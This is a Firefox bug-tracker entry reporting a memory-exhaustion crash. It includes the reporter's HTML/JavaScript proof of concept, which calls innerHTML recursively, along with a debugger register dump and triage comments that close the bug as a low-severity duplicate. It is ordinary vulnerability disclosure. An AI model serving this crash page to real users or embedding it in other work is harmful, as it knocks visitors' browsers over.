Closed Bug 784501 Opened 13 years ago Closed 13 years ago

Memory Exhaustion DoS Exploit

Categories

(Core :: DOM: HTML Parser, defect)

Product:
Core
Component:
DOM: HTML Parser
Platform:
x86
Windows 7
Type:
defect
Priority:
Not set
Severity:
major

Tracking

()

Status:
RESOLVED DUPLICATE of bug 618234

People

(Reporter: shashankcyberboy, Unassigned)

Details

(4 keywords)

Attachments

(2 files)

Reporter's Testcase
149 bytes, text/html
Details
WinDbg Stack
71.71 KB, text/plain
Details
<!-- --------------------------------------------------- Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit --------------------------------------------------- Description: Mozilla Firefox is prone to a memory exhaustion vulnerability. The issue has been tested on Firefox 14.01, prior versions may also be affected. mozalloc.cpp, line 184: moz_xposix_memalign(void **ptr, size_t alignment, size_t size) { int err = posix_memalign(ptr, alignment, size); if (UNLIKELY(err && ENOMEM == err)) { mozalloc_handle_oom(); return moz_xposix_memalign(ptr, alignment, size); } // else: (0 == err) or (EINVAL == err) return err; } A crafted JavaScript leads the application to crash. Stacktrace (Windows 7 SP1): EAX 00000000 ECX 5D923896 MSVCR100.5D923896 EDX 00000003 EBX 7FB00000 UNICODE "xxxxxxxxx [...]" ESP 002BB7F8 EBP 002BB85C ESI 5D8D1EC6 MSVCR100.__p__iob EDI 5D92379C MSVCR100.fputs EIP 73FC1999 mozalloc.73FC1999 C 0 ES 0023 32bit 0(FFFFFFFF) P 0 CS 001B 32bit 0(FFFFFFFF) A 0 SS 0023 32bit 0(FFFFFFFF) Z 0 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFDF000(C000) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (00000008) EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty 1.0000000000000000000 ST1 empty 0.1085754583206562651 ST2 empty -0.0696429635909516231 ST3 empty 86.763962149620056150 ST4 empty 31200.200000000000730 ST5 empty 1.3451474216221712500e+15 ST6 empty 1.0390856000000000000e+10 ST7 empty 0.0 3 2 1 0 E S P U O Z D I FST 0022 Cond 0 0 0 0 Err 0 0 1 0 0 0 1 0 (GT) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 --> <html> <head> <title></title> </head> <body></body> <script> function e(x) { document.body.innerHTML += x; e(x + 'x'); }; e('x') </script> </html>
DoS bugs from an intentional abort on OOM do not need to remain hidden.
Group: core-security
Keywords: sec-low
(In reply to Benjamin Smedberg [:bsmedberg] from comment #1) > DoS bugs from an intentional abort on OOM do not need to remain hidden. ok
Keywords: crash, reproducible, testcase
Product: Firefox → Core
Version: unspecified → Trunk
Attached file WinDbg Stack
Log against Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0 ID:20120821135628 (x64 Build) with javascript.options.mem.log;true.
Status: UNCONFIRMED → NEW
Component: General → HTML: Parser
Ever confirmed: true
This is a duplicate. Please find the original and mark this a duplicate?
Whiteboard: DUPEME
I'm not sure, but maybe Bug 659333 whose Testcase uses innerHTML too?
(In reply to Boris Zbarsky (:bz) [In and out Aug 1 - 10, out Aug 11-20] from comment #5) > This is a duplicate. Please find the original and mark this a duplicate? sorry but itz not duplicate :/
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → DUPLICATE
Whiteboard: DUPEME
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: